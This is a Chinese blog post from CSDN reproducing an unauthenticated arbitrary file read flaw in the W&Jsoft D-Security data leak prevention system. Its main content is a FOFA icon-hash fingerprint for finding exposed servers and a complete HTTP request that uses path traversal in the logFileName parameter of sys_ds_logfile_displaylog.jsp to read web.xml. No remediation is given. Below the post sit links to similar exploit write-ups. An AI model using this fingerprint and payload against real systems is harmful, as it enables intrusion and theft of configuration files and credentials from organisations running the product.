W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞

已于 2025-01-13 22:23:20 修改
阅读量262 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
于 2025-01-13 22:22:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/user_hs/article/details/145125336

一、漏洞简介

W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞

二、漏洞影响

三、网络测绘:

fofa:
icon_hash="616947260"

四、复现过程

首页

在这里插入图片描述

步骤 POC 1

数据包

GET /DLP/public/admintool/system_setting/sys_ds_logfile_displaylog.jsp?logType=tomcat&logFileName=../../../../../../D-Security/webapps/DLPWebApps/WEB-INF/web.xml HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Priority: u=0, i
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Upgrade-Insecure-Requests: 1
某赛通电子文档安全管理系统 ClientAjax 任意文件下载
weixin_43567873的博客
03-04 141
某赛通电子文档安全管理系统 ClientAjax 任意文件下载
W&Jsoft-D-Security数据泄露系统(DLP) sys_ds_logfile_displaylog.jsp 任意文件读取漏洞复现(附脚本)
iSee857的博客
01-06 207
W&Jsoft-D-Security数据泄露系统(DLP) sys_ds_logfile_displaylog.jsp接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
(漏洞复现:CNVD-2023-09184)亿赛通电子文档安全管理系统任意文件读取漏洞
zkaqlaoniao的博客
12-28 3380
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取
swordheart的博客
05-28 228
W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取
im即时通讯系统preview.php前台任意⽂件上传
swordheart的博客
05-20 146
im即时通讯系统preview.php接口存在任意文件上传
数据泄露防护(DLP)系统NetSecConfigAjax接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-23 866
数据泄露防护(DLP)系统是一款综合性的数据安全产品,旨在通过多种先进技术手段保护企业的敏感数据,防止数据泄露。某数据泄露防护(DLP)系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感数据
W&Jsoft-D-Security数据仿泄露系统(DLP)sys_ds_logfile_displaylog存在任意文件读取漏洞
缘梦未来的博客
01-04 272
W&Jsoft-D-Security数据仿泄露系统(DLP)是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
D-Security终端文件保护系统logFileName存在任意文件读取漏洞
缘梦未来的博客
01-08 182
D-Security 端点文件保护系统是由以柔资讯(W&Jsoft)开发的文件加密产品,旨在从文件生成时即对其进行自动加密,提供全生命周期的安全防护。 该系统被政府和国安局等情治单位认可为安全的文件加密产品,符合营业秘密法规范,能够完整记录用户对文件的访问和交换轨迹,提供文件访问溯源记录,帮助企业建立信息安全治理循环。 此外,D-Security 支持与企业内部的 PLM、ERP、KM 等信息系统无缝整合,方便各部门根据业务需求灵活设置机密文件的访问权限,提升企业核心竞争力。
2022-7-16 第七组 ---数组实现员工管理系统
qq_49036727的博客
07-18 311
Java实现员工管理系统
serv-u注册码
03-13
在IT领域,特别是网络管理与文件传输服务中,Serv-U是一款颇受欢迎的FTP服务器软件,由JSOFT公司开发。其强大的功能、稳定的性能以及友好的用户界面使其成为企业级应用的理想选择。然而,Serv-U的某些版本是需要授权...
数据防泄密(DLP系统
热门推荐
bruce135lee的专栏
11-23 2万+
数据防泄密(DLP系统 领先的文档安全管理专家! 对于核心数据,需要控制数据过程使用安全时,采用透明加密控制方式控制数据安全使用。 系统采用基于Windows文件系统驱动开发,结合高强度国际流行加密算法,对文件进行驱动层加解密操作。 对于需要保护的文件类型,系统会在文件保存时对其进行强制性的加密,并且不改变文件的格式和形态。 如果没有合法的使用身份、访问权限和正确的安全通道,所
企业网络安全的“金字塔”策略:构建全方位防护体系的核心思路
2301_79223853的博客
07-10 240
构建企业网络安全的“金字塔”体系,核心在于多层次、多维度的防护策略。只有将主动检测、应用安全、访问加速和持续监控有机结合,企业才能在激烈的网络环境中立于不败之地。未来,安全将不再是单一的防线,而是企业数字化战略的重要组成部分。在数字化转型的浪潮中,企业的网络安全已从单一的防护措施,发展成为多层次、全方位的安全体系。安全不是一次性工作,而是持续的过程。利用大数据和AI技术,分析异常行为,快速做出反应,形成“防、查、控”一体的安全闭环。通过内容分发网络(CDN)等技术,将内容就近分发,提升访问速度,减少延迟。
网络安全实训室建设方案全攻略
whwzzc的博客
07-09 600
通过这些实训教学,学生不仅能够掌握网络安全的基本理论知识,还能够熟悉各种网络安全设备的配置与管理方法,培养出具备全面网络安全知识和技能的专业人才,满足社会和行业的网络安全需求。通过在实训室中模拟真实的网络环境,开展各类网络安全实训项目,学生能够将所学的理论知识转化为实际操作技能,提升应对复杂网络安全问题的能力,从而更好地满足市场对网络安全人才的迫切需求 ,为筑牢网络安全防线贡献力量。通过科学合理的规划,配备先进的硬件设备和实用的软件系统,打造功能完善的实训环境,为网络安全人才的培养提供了坚实的物质基础。
Web安全-Linux基础-01-初识Linux
m0_52505633的博客
07-11 909
学习Web安全方向,需要熟练使用Linux的常用基础命令,方便后续的学习,这里是个人学习笔记,仅做参考。
网络安全(初级)(1)
2301_80632830的博客
07-10 492
2. psexec是可利用的一个javascripe(JS)的一个模块。(1)MSF 搜索永恒之蓝的漏洞 输入search ms17-010。分别查看win7和kali中的ip地址。3. command是运行cmd的。(1)nmap -sT 扫描端口。1. blue就是永恒之蓝的漏洞。添加pikachu靶场文件。4. 最后一个是探测的模块。进入pikachu靶场。(2)MSF 端口扫描。扫出来是likely。
网络安全小练习
2301_80296870的博客
07-12 223
IP可以在主机终端使用相关命令例如windows(ipconfig)、linux(ifconfig)输入完docker pull nginx 后出现。2.改变镜像源(推荐国内镜像源:阿里云镜像源)在该文件中配置自己的代理IP以及代理端口。配置docker daemon。登录阿里云容器镜像源服务(复制系统分配的专属地址。1.安装DOCKER。重启docker服务。
网络安全|网络准入控制系统有哪些?网络准入控制系统十大解决方案详解
最新发布
2501_92182754的博客
07-14 436
网络准入控制系统很重要。
网络安全之内网渗透实操
anquan2233的博客
07-07 1490
成功获取 shell 后,执行相关命令进行信息搜集,发现目标存在双网卡,这意味着目标可能处于多个网络环境,增加了内网渗透的复杂性与可能性。尝试使用常见的弱口令登录 weblogic 失败后,借助 weblogic 漏洞利用工具进行深入检测,发现目标存在 CVE-2020-2551 漏洞。通过 net user /domain 命令确认当前机器处于域环境内,再使用 net group "domain controllers" /domain 命令定位到域控,通常情况下,DNS 服务器即为域控。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值